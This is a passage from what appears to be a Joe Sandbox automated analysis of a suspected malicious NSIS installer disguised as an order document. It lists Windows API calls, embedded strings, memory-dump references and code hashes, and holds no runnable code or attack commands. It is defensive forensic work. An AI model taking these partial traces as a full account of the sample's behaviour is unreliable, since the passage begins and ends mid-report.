                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D75
                                                    • Part of subcall function 00404ECE: lstrlenW.KERNEL32(00422F48,00422F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F6F
                                                    • Part of subcall function 00404ECE: wsprintfW.USER32 ref: 00404F78
                                                    • Part of subcall function 00404ECE: SetDlgItemTextW.USER32(?,00422F48), ref: 00404F8B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3702105487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 0000000B.00000002.3702072144.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702137518.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702174015.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702199888.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: A$H/B
                                                  • API String ID: 2624150263-2024176164
                                                  • Opcode ID: 5391f58817f8cb56906519b00545e03f0092e071ef6120135fd40e88676cc4e1
                                                  • Instruction ID: d1d33be9ed2b3c34a6912e34267e60509d8c64d33f654f2361a06684bbdb7283
                                                  • Opcode Fuzzy Hash: 5391f58817f8cb56906519b00545e03f0092e071ef6120135fd40e88676cc4e1
                                                  • Instruction Fuzzy Hash: FBA191B1900209ABDB11AFA5CD41AEFB7B8FF84754F11843BF601B62D1DB7C89418B69
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00403109
                                                  • GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 00403125
                                                    • Part of subcall function 00406192: GetFileAttributesW.KERNEL32(00000003,00403138,00437800,80000000,00000003), ref: 00406196
                                                    • Part of subcall function 00406192: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 004061B8
                                                  • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,00435800,00435800,00437800,00437800,80000000,00000003), ref: 0040316E
                                                  • GlobalAlloc.KERNEL32(00000040,00008001), ref: 004032B0
                                                  Strings
                                                  • Inst, xrefs: 004031DA
                                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403347
                                                  • Null, xrefs: 004031EC
                                                  • soft, xrefs: 004031E3
                                                  • Error launching installer, xrefs: 00403145
                                                  • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004032F9
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3702105487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 0000000B.00000002.3702072144.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702137518.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702174015.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702199888.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                  • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                  • API String ID: 2803837635-787788815
                                                  • Opcode ID: b260e9cf65809c5e045d7eb05f3d0780ec45527b2fd5cc5e61384506655bc9c2
                                                  • Instruction ID: 4d59aa34fe8aef517225e0e03f455ac639a07fb2fd098cfe03fbce1fe051b31e
                                                  • Opcode Fuzzy Hash: b260e9cf65809c5e045d7eb05f3d0780ec45527b2fd5cc5e61384506655bc9c2
                                                  • Instruction Fuzzy Hash: 4671D071A00204ABDB20DFA4DD86BAE3EACAB04715F20457FE915B72C1CB789F418B5C
                                                  APIs
                                                  • GetSystemDirectoryW.KERNEL32(00427A00,00000400), ref: 00406801
                                                  • GetWindowsDirectoryW.KERNEL32(00427A00,00000400,00000000,00421F28,?,?,00000000,00000000,00000000,00000000), ref: 00406817
                                                  • SHGetPathFromIDListW.SHELL32(00000000,00427A00), ref: 00406875
                                                  • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 0040687E
                                                  • lstrcatW.KERNEL32(00427A00,\Microsoft\Internet Explorer\Quick Launch,00000000,00421F28,?,?,00000000,00000000,00000000,00000000), ref: 004068A9
                                                  • lstrlenW.KERNEL32(00427A00,00000000,00421F28,?,?,00000000,00000000,00000000,00000000), ref: 00406903
                                                  Strings
                                                  • \Microsoft\Internet Explorer\Quick Launch, xrefs: 004068A3
                                                  • Software\Microsoft\Windows\CurrentVersion, xrefs: 004067D2
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3702105487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 0000000B.00000002.3702072144.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702137518.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702174015.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702199888.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                  • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                  • API String ID: 4024019347-730719616
                                                  • Opcode ID: 6f2761d7cb5587a470c052371fa5fb6b0836c691dcd2ac77b9ed8a87730eab65
                                                  • Instruction ID: c05bc8db6a500faa8ceae89892d654845b9b7d80f8daaf315b7a9d2c48b59061
                                                  • Opcode Fuzzy Hash: 6f2761d7cb5587a470c052371fa5fb6b0836c691dcd2ac77b9ed8a87730eab65
                                                  • Instruction Fuzzy Hash: CE6147B2A053019BEB20AF24DC84B6B77D8AF54314F26453FF587B26D0DA3C8961875E
                                                  APIs
                                                  • GetWindowLongW.USER32(?,000000EB), ref: 004046A5
                                                  • GetSysColor.USER32(00000000), ref: 004046E3
                                                  • SetTextColor.GDI32(?,00000000), ref: 004046EF
                                                  • SetBkMode.GDI32(?,?), ref: 004046FB
                                                  • GetSysColor.USER32(?), ref: 0040470E
                                                  • SetBkColor.GDI32(?,?), ref: 0040471E
                                                  • DeleteObject.GDI32(?), ref: 00404738
                                                  • CreateBrushIndirect.GDI32(?), ref: 00404742
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3702105487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 0000000B.00000002.3702072144.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702137518.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702174015.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702199888.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                  • String ID:
                                                  • API String ID: 2320649405-0
                                                  • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                  • Instruction ID: dc9e33635e48260261a40037ac820fc698cd45b4c1bae75aa0874807b7806060
                                                  • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                  • Instruction Fuzzy Hash: B321A7715007049BCB309F38DA48B5B7BF4AF82714B00893DE9A6B72E0D778E904CB58
                                                  APIs
                                                  • ReadFile.KERNEL32(?,?,?,?), ref: 0040277D
                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004027B8
                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027DB
                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027F1
                                                    • Part of subcall function 00406273: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406289
                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040289D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3702105487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 0000000B.00000002.3702072144.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702137518.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702174015.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702199888.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: File$Pointer$ByteCharMultiWide$Read
                                                  • String ID: 9
                                                  • API String ID: 163830602-2366072709
                                                  • Opcode ID: a549dd45bdf68c9719d70c69bb74270c52082c3b2606a719e6898ef3dc67c70c
                                                  • Instruction ID: 77fbecb4268093b3ffff8c623a80bd5bb6512b600f7762490a4bde5bc174ce64
                                                  • Opcode Fuzzy Hash: a549dd45bdf68c9719d70c69bb74270c52082c3b2606a719e6898ef3dc67c70c
                                                  • Instruction Fuzzy Hash: 9A511D75D04219AADF20EFD4CA85AAEBB79FF44304F14817BE501B62D0D7B89D82CB58
                                                  APIs
                                                  • lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
                                                  • lstrlenW.KERNEL32(004030CD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
                                                  • lstrcatW.KERNEL32(00421F28,004030CD,004030CD,00421F28,00000000,00000000,00000000), ref: 00405782
                                                  • SetWindowTextW.USER32(00421F28,00421F28), ref: 00405794
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3702105487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 0000000B.00000002.3702072144.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702137518.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702174015.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702199888.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 2531174081-0
                                                  • Opcode ID: 478899543bd82950d8a4d30903f75c7e93d106f960787587e0f6081d0d83e678
                                                  • Instruction ID: 5626e068ca8b5f19a977ecdc4b6aac72793d852c885f634865ceb3a8b40a731b
                                                  • Opcode Fuzzy Hash: 478899543bd82950d8a4d30903f75c7e93d106f960787587e0f6081d0d83e678
                                                  • Instruction Fuzzy Hash: 6F218E71900558FACB119F65DD849CFBFB9EF45350F10803AF904B62A0C7794A819F68
                                                  APIs
                                                  • DestroyWindow.USER32(?,00000000), ref: 0040306E
                                                  • GetTickCount.KERNEL32 ref: 0040308C
                                                  • wsprintfW.USER32 ref: 004030BA
                                                    • Part of subcall function 00405727: lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
                                                    • Part of subcall function 00405727: lstrlenW.KERNEL32(004030CD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
                                                    • Part of subcall function 00405727: lstrcatW.KERNEL32(00421F28,004030CD,004030CD,00421F28,00000000,00000000,00000000), ref: 00405782
                                                    • Part of subcall function 00405727: SetWindowTextW.USER32(00421F28,00421F28), ref: 00405794
                                                    • Part of subcall function 00405727: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
                                                    • Part of subcall function 00405727: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
                                                    • Part of subcall function 00405727: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
                                                  • CreateDialogParamW.USER32(0000006F,00000000,00402FB8,00000000), ref: 004030DE
                                                  • ShowWindow.USER32(00000000,00000005), ref: 004030EC
                                                    • Part of subcall function 00403037: MulDiv.KERNEL32(?,00000064,?), ref: 0040304C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3702105487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 0000000B.00000002.3702072144.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702137518.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702174015.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702199888.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                  • String ID: ... %d%%
                                                  • API String ID: 722711167-2449383134
                                                  • Opcode ID: e30de3e9c70cc1782be0847fd193c9846037557e070c342b8441f703718ebcd4
                                                  • Instruction ID: 97c902a025ac2946b461c4c6cbd0392064296d6115d029b2f7da86e316ad9030
                                                  • Opcode Fuzzy Hash: e30de3e9c70cc1782be0847fd193c9846037557e070c342b8441f703718ebcd4
                                                  • Instruction Fuzzy Hash: 5901A530542320EBCB31AF60AE0AA6B7F6CAB00702F54443BF441B15D5CAB84641CB9E
                                                  APIs
                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404FF7
                                                  • GetMessagePos.USER32 ref: 00404FFF
                                                  • ScreenToClient.USER32(?,?), ref: 00405019
                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040502B
                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00405051
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3702105487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 0000000B.00000002.3702072144.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702137518.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702174015.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702199888.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: Message$Send$ClientScreen
                                                  • String ID: f
                                                  • API String ID: 41195575-1993550816
                                                  • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                  • Instruction ID: 35c53ee3dfde216a4a17f9e8076a2c946c4c65f0c866826bb74e9a6ab3448864
                                                  • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                  • Instruction Fuzzy Hash: F3015E31900218BADB00DBA4DD85BFFBBBCEF55711F10412BBA51B61D0D7B49A058BA4
                                                  APIs
                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FD6
                                                  • wsprintfW.USER32 ref: 0040300A
                                                  • SetWindowTextW.USER32(?,?), ref: 0040301A
                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 0040302C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3702105487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 0000000B.00000002.3702072144.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702137518.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702174015.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702199888.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                  • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                  • API String ID: 1451636040-1158693248
                                                  • Opcode ID: 66e00694bf9c2fcf5817c91216ca696d61ea9415c1ed8b1f40767934bfa15992
                                                  • Instruction ID: bec97a1ff423586d6a5c987b60c5c02bd53578e49ae90ce5674df69195bed5dc
                                                  • Opcode Fuzzy Hash: 66e00694bf9c2fcf5817c91216ca696d61ea9415c1ed8b1f40767934bfa15992
                                                  • Instruction Fuzzy Hash: 98F0317054020CABEF209F60DD4ABEE3B6CEB04349F00803AF646B51D0DBB99A558F99
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3727538397.0000000038210000.00000040.00000800.00020000.00000000.sdmp, Offset: 38210000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_38210000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $q$$q$$q$$q$$q$$q$$q$$q
                                                  • API String ID: 0-3886557441
                                                  • Opcode ID: 7c5a9de354de8b85d99f902249c93150b1a4c8803f101a4cab2d119db7c14b70
                                                  • Instruction ID: 24d910076d2cbf984cd5789a1176220b054c3ca02c02c39c64e309deeac607a3
                                                  • Opcode Fuzzy Hash: 7c5a9de354de8b85d99f902249c93150b1a4c8803f101a4cab2d119db7c14b70
                                                  • Instruction Fuzzy Hash: 45912D74A1030ADFEB18DB65E9557AE77F3BF84341F318529E802AB291DF349942CB90
                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029D6
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029F2
                                                  • GlobalFree.KERNEL32(?), ref: 00402A2B
                                                  • GlobalFree.KERNEL32(00000000), ref: 00402A3E
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A5A
                                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A6D
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3702105487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 0000000B.00000002.3702072144.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702137518.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702174015.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702199888.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                  • String ID:
                                                  • API String ID: 2667972263-0
                                                  • Opcode ID: 90865e7bdfac0d2ec63d9585e4062f151f8a9dd66d81cd5b57f304ac9c2b5374
                                                  • Instruction ID: 349357d0e6511a5e46fd8e19636faeb724d9b15f10a4c99f70335ec2520be7da
                                                  • Opcode Fuzzy Hash: 90865e7bdfac0d2ec63d9585e4062f151f8a9dd66d81cd5b57f304ac9c2b5374
                                                  • Instruction Fuzzy Hash: 2731B171D00124BBCF21AFA5DD89D9E7E79AF44364F14023AF415762E1CB794D418F68
                                                  APIs
                                                  • lstrlenW.KERNEL32(00422F48,00422F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F6F
                                                  • wsprintfW.USER32 ref: 00404F78
                                                  • SetDlgItemTextW.USER32(?,00422F48), ref: 00404F8B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3702105487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 0000000B.00000002.3702072144.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702137518.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702174015.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702199888.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: ItemTextlstrlenwsprintf
                                                  • String ID: %u.%u%s%s$H/B
                                                  • API String ID: 3540041739-2222257793
                                                  • Opcode ID: 701484786e9e788ccce1f8e608fe17be4446b7c9895a13b6126df495f4584910
                                                  • Instruction ID: d50fdcff321319429c488fc01686433ffa638a32cb0890ada2b0e386a1fa8516
                                                  • Opcode Fuzzy Hash: 701484786e9e788ccce1f8e608fe17be4446b7c9895a13b6126df495f4584910
                                                  • Instruction Fuzzy Hash: 8B11A873A0412837DB00656D9D45E9E369C9B85374F154637FA26F31D1E979CC2182E8
                                                  APIs
                                                  • CharNextW.USER32(?,*?|<>/":,00000000,00434000,771B3420,00436800,00000000,00403640,00436800,00436800,0040394F,?,00000008,0000000A,0000000C), ref: 004069B3
                                                  • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004069C2
                                                  • CharNextW.USER32(?,00434000,771B3420,00436800,00000000,00403640,00436800,00436800,0040394F,?,00000008,0000000A,0000000C), ref: 004069C7
                                                  • CharPrevW.USER32(?,?,771B3420,00436800,00000000,00403640,00436800,00436800,0040394F,?,00000008,0000000A,0000000C), ref: 004069DA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3702105487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 0000000B.00000002.3702072144.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702137518.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702174015.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702199888.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: Char$Next$Prev
                                                  • String ID: *?|<>/":
                                                  • API String ID: 589700163-165019052
                                                  • Opcode ID: 7c4491ab095b24fecdd0000f8ec6f0e383ca7ce11269c465865605e120ff5cd6
                                                  • Instruction ID: ee050b90af12f7da754e5e1a7cefda923f304df8a209a79dab08f9ec4fc7f4f9
                                                  • Opcode Fuzzy Hash: 7c4491ab095b24fecdd0000f8ec6f0e383ca7ce11269c465865605e120ff5cd6
                                                  • Instruction Fuzzy Hash: 0311B695800612A5DB303B148D40AB7A2F8AF55794F52403FED9AB3AC1EB7C4C9286BD
                                                  APIs
                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406A3D
                                                  • wsprintfW.USER32 ref: 00406A78
                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A8C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3702105487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 0000000B.00000002.3702072144.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702137518.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702174015.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702199888.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                  • String ID: %s%S.dll$UXTHEME
                                                  • API String ID: 2200240437-1106614640
                                                  • Opcode ID: bea2c3dfad6db3553b24c87bd1a60070de232aee380c5cee9c100d0800ee2260
                                                  • Instruction ID: 2c328a31db22aac531adf2f34800fe5ee0562984a44f040f64af452ff7173633
                                                  • Opcode Fuzzy Hash: bea2c3dfad6db3553b24c87bd1a60070de232aee380c5cee9c100d0800ee2260
                                                  • Instruction Fuzzy Hash: 36F0FC3060011967CF14BB64DD0EF9B375C9B01704F10847AA546F10D0EB789668CF98
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3727538397.0000000038210000.00000040.00000800.00020000.00000000.sdmp, Offset: 38210000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_38210000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $q$$q$$q$$q$$q$$q
                                                  • API String ID: 0-2069967915
                                                  • Opcode ID: 3c0627e836ea8b9211d1bfbcb8e2a22985ef8e244a3bfcb45987e49e3d2f53e6
                                                  • Instruction ID: 33e7fafe7c513e2b9164b2ebc710cee5a04d555b4ce0cbf4169ecd0f1d14b103
                                                  • Opcode Fuzzy Hash: 3c0627e836ea8b9211d1bfbcb8e2a22985ef8e244a3bfcb45987e49e3d2f53e6
                                                  • Instruction Fuzzy Hash: 40F10A34A10605DFEB19EBA4D494A6EBBF3BF88341F248569D405AB359DF35EC42CB80
                                                  APIs
                                                  • lstrcatW.KERNEL32(00000000,00000000,0040A5F8,00435000,?,?,00000031), ref: 004017D5
                                                  • CompareFileTime.KERNEL32(-00000014,?,0040A5F8,0040A5F8,00000000,00000000,0040A5F8,00435000,?,?,00000031), ref: 004017FA
                                                    • Part of subcall function 004066A2: lstrcpynW.KERNEL32(?,?,00000400,004037D7,00428A60,NSIS Error,?,00000008,0000000A,0000000C), ref: 004066AF
                                                    • Part of subcall function 00405727: lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
                                                    • Part of subcall function 00405727: lstrlenW.KERNEL32(004030CD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
                                                    • Part of subcall function 00405727: lstrcatW.KERNEL32(00421F28,004030CD,004030CD,00421F28,00000000,00000000,00000000), ref: 00405782
                                                    • Part of subcall function 00405727: SetWindowTextW.USER32(00421F28,00421F28), ref: 00405794
                                                    • Part of subcall function 00405727: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
                                                    • Part of subcall function 00405727: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
                                                    • Part of subcall function 00405727: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3702105487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 0000000B.00000002.3702072144.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702137518.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 0000000B.00000002.3702174015.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
